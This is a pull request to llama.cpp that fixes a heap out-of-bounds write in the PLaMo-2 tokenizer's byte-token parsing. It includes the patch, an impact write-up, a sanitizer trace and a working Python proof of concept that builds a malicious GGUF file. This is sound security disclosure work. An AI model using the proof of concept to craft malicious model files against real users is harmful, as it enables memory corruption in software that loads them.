### PR TITLE
vocab : fix heap OOB write in PLaMo-2 <0xNN> byte-token parsing

### DIFF
--- a/src/llama-vocab.cpp
+++ b/src/llama-vocab.cpp
@@ -1364,8 +1364,23 @@ struct llm_tokenizer_plamo2 : llm_tokenizer {
             if (vocab.is_byte(token_id)) {
                 if (entry.text.length() == 6 && entry.text.substr(0, 3) == "<0x" && entry.text.back() == '>') {
                     std::string hex_str = entry.text.substr(3, 2);
-                    int byte_val = std::stoi(hex_str, nullptr, 16);
-                    bytes_[byte_val] = static_cast<llama_token>(token_id);
+                    // "<0xNN>": NN must be exactly two hex digits in [00,FF].
+                    // Without this guard "<0x-1>" parses to -1, so bytes_[-1] is
+                    // a heap out-of-bounds write, and a non-hex NN makes
+                    // std::stoi throw std::invalid_argument (uncaught -> abort).
+                    int byte_val = -1;
+                    try {
+                        size_t pos = 0;
+                        byte_val = std::stoi(hex_str, &pos, 16);
+                        if (pos != hex_str.size() || byte_val < 0 || byte_val > 255) {
+                            byte_val = -1;
+                        }
+                    } catch (const std::exception &) {
+                        byte_val = -1;
+                    }
+                    if (byte_val >= 0) {
+                        bytes_[byte_val] = static_cast<llama_token>(token_id);
+                    }
                 }
                 continue;
             }


### PR DESCRIPTION
## Summary

Security fix — heap out-of-bounds **write** in the PLaMo-2 tokenizer, reachable
just by **loading a crafted GGUF model** (no inference, no user input).

`llm_tokenizer_plamo2::build()` (`src/llama-vocab.cpp`) maps `<0xNN>` byte tokens
into a fixed 256-entry `bytes_` array, using the two hex chars as the index with
no range check:

```cpp
std::string hex_str = entry.text.substr(3, 2);
int byte_val = std::stoi(hex_str, nullptr, 16);          // "-1".."-f" => -1..-15
bytes_[byte_val] = static_cast<llama_token>(token_id);   // bytes_ is std::vector<int32>(256)
```

A byte-typed token (`token_type = 6`) whose text is `"<0x-1>"` makes `std::stoi`
return `-1`, so `bytes_[-1] = token_id` writes 4 bytes **before** the buffer. Both
the offset (`-4 .. -60`, via `"<0x-1>" .. "<0x-f>"`) and the written 32-bit value
(`token_id` — the token's index in the vocab) are attacker-controlled. A non-hex
`NN` (e.g. `"<0xZZ>"`) additionally makes `std::stoi` throw uncaught.

## Impact

Attacker-controlled heap OOB write while loading an untrusted `.gguf` — a routine
operation (models fetched from public registries, passed to `llama-server`, etc.).
Same threat model as GHSA-8wwf-w4qm-gpqr / CVE-2025-49847 (vocabulary-loading
overflow). I believe this warrants a security advisory / CVE.

## Reproduce

`poc.py` (stdlib only) writes a 297-byte model; load it with a sanitizer build:

```
python3 poc.py
./llama-cli -m poc.gguf -p x          # cmake ... -DCMAKE_CXX_FLAGS=-fsanitize=address
```

```
==ERROR: AddressSanitizer: heap-buffer-overflow   WRITE of size 4
    #0 llm_tokenizer_plamo2::build(...)             src/llama-vocab.cpp:1368
    #1 llm_tokenizer_plamo2::llm_tokenizer_plamo2   src/llama-vocab.cpp:1344
    #4 llama_vocab::impl::init_tokenizer(...)        src/llama-vocab.cpp:3115
    #5 llama_vocab::impl::load(...)                  src/llama-vocab.cpp:2466
    #7 llama_model_base::load_vocab(...)             src/llama-model.cpp:1239
    ...
0x...327c is located 4 bytes before 1024-byte region   (bytes_, allocated at src/llama-vocab.cpp:1350)
SUMMARY: AddressSanitizer: heap-buffer-overflow src/llama-vocab.cpp:1368
```

After this fix the same file is rejected cleanly (`Byte token for <0x0> is not set`),
no OOB.

<details><summary>poc.py</summary>

```python
import struct

# builds a gguf that triggers the plamo2 tokenizer heap overflow (bytes_[-1]) at load time
# run: python3 poc.py && ./llama-cli -m poc.gguf -p x     # build llama.cpp with -fsanitize=address

def s(x):
    x = x.encode() if isinstance(x, str) else x
    return struct.pack("<Q", len(x)) + x

def arr(key, etype, fmt, vals):
    b = s(key) + struct.pack("<IIQ", 9, etype, len(vals))   # 9 = array
    for v in vals:
        b += s(v) if etype == 8 else struct.pack(fmt, v)
    return b

kv  = s("general.architecture") + struct.pack("<I", 8) + s("llama")
kv += s("tokenizer.ggml.model")  + struct.pack("<I", 8) + s("plamo2")
kv += arr("tokenizer.ggml.tokens",     8, None, ["<unk>", "<0x-1>"])   # "<0x-1>" -> stoi -> -1
kv += arr("tokenizer.ggml.token_type", 5, "<i", [2, 6])                # 6 = BYTE
kv += arr("tokenizer.ggml.scores",     6, "<f", [0.0, 0.0])

open("poc.gguf", "wb").write(b"GGUF" + struct.pack("<IQQ", 3, 0, 5) + kv)   # magic, ver=3, 0 tensors, 5 kv
print("poc.gguf written")
```
</details>

## Fix

Only index `bytes_` when `NN` parses to a value in `[0,255]`, and swallow
`std::stoi` exceptions (this commit).

---
AI-assisted discovery and PoC; reproduced, verified and authored by me.
